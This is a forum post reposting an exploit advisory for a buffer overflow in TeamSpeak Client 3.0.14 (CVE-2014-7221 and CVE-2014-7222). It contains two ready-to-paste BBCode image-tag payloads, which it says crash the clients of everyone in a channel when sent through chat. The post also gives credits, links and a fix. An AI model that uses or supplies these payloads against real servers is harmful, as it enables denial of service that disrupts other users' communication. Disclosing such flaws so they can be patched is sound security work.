Active Members akkiliON Posted October 6, 2014 Active Members Report Posted October 6, 2014 ################################################################################################### Title : TeamSpeak Client v3.0.14 - Buffer Overflow Vulnerability# Severity : High+/Critical# Reporter(s) : SpyEye & Christian Galeone# Software Version : 3.0.14 & Previous Versions# Software Name : TeamSpeak Client# Software Download Link : http://letoltes.szoftverbazis.hu/IbAi1W2OLVclvRLS2KUGHw/1410984789/teamspeak-3014/TeamSpeak3-Client-win64-3.0.14.exe# Vendor Home : http://teamspeak.com/# Date(s) : 01/04/2014 - 0r161n4l c0d3 By SpyEye# : 21/05/2014 - v4r14n7 c0d3 By Christian Galeone# Tested in : Win7 - TeamSpeak Client V3.0.14# CVE(s) : CVE-2014-7221 By SpyEye & CVE-2014-7222 By Christian Galeone#################################################################################################### # Effects:# # Mass Crash Client (You & The User(s) Connected With A Vulnerable Version Into YOUR Channel)# # Note:## The Following Code MUST Be Sent Into The Chat/Server Tab For A Channel/Server Crash Effect. ## PoC:# # 1) Buffer Overflow Vulnerability - # 0r161n4l c0d3 n.1 # By SpyEye## CVE: CVE-2014-7221## [img=[img]//http://www.teamspeak.com/templates/teamspeak_v3/images/blank.gif][/img] [img=[img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.28][/img] [img=[img]//http://i.answers.microsoft.com/static/images/defaultuser7a.png?ver=4.6.0.28][/img] [img=[img]//http://i.answers.microsoft.com/static/images/defaultuser7b.png?ver=4.6.0.28][/img] [img=[img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.24][/img] [img=[img]//http://i.answers.microsoft.com/static/images/defaultuser7z.png?ver=4.6.0.28][/img]# # 2) Buffer Overflow Vulnerability - # v4r14n7 c0d3 n.2 # By Christian Galeone## CVE: CVE-2014-7222# # [img=[img]\\1\z][/img][img=[img]\\2\z][/img][img=[img]\\3\z][/img][img=[img]\\4\z][/img][img=[img]\\5\z][/img][img=[img]\\6\z][/img][img=[img]\\7\z][/img][img=[img]\\8\z][/img][img=[img]\\9\z][/img][img=[img]\\10\z][/img][img=[img]\\11\z][/img][img=[img]\\12\z][/img][img=[img]\\13\z][/img][img=[img]\\14\z][/img][img=[img]\\15\z][/img][img=[img]\\16\z][/img][img=[img]\\17\z][/img][img=[img]\\18\z][/img][img=[img]\\1\z][/img][img=[img]\\2\z][/img][img=[img]\\3\z][/img][img=[img]\\4\z][/img][img=[img]\\5\z][/img][img=[img]\\6\z][/img][img=[img]\\7\z][/img][img=[img]\\8\z][/img][img=[img]\\9\z][/img][img=[img]\\10\z][/img][img=[img]\\11\z][/img][img=[img]\\12\z][/img][img=[img]\\13\z][/img]# # Fix:## http://screech.me/ts3/plugins/antifreeze.html## OR## http://www.teamspeak.com/?page=downloads## Original Source:## http://r4p3.net/public/ts3bbcodefreeze.txt## http://r4p3.net/forum/reverse-engineering/38/teamspeak-3-exploit-bb-code-freeze-crash-not-responding/905/## Credit(s):## SpyEye (http://forum.teamspeak.com/member.php/263635-SpyEye) - 0r161n4l 3xpl017 d3v3l0p3r## Christian Galeone - V4r14n7 3xpl017 d3v3l0p3r#################################################################################################### Quote
